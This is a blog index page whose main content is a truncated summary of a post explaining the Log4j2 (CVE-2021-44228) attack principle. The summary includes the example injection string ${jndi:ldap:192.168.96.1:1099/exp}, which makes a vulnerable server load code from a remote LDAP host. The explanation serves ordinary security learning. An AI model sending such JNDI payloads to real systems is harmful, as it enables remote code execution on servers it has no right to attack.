会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
whoam1
博客园
首页
新随笔
联系
订阅
管理
2023年3月28日
log4j2
摘要: Log4j2(CVE-2021-44228) 漏洞攻击原理 原理概述 当用户输入信息时,应用程序中的log4j2组件会将信息记录到日志中 假如日志中含有该语句${jndi:ldap:192.168.96.1:1099/exp},log4j就会去解析该信息,通过jndi的lookup()方法去解析该U
阅读全文
posted @ 2023-03-28 14:35 whoam1
阅读(320)
评论(2)
推荐(0)
公告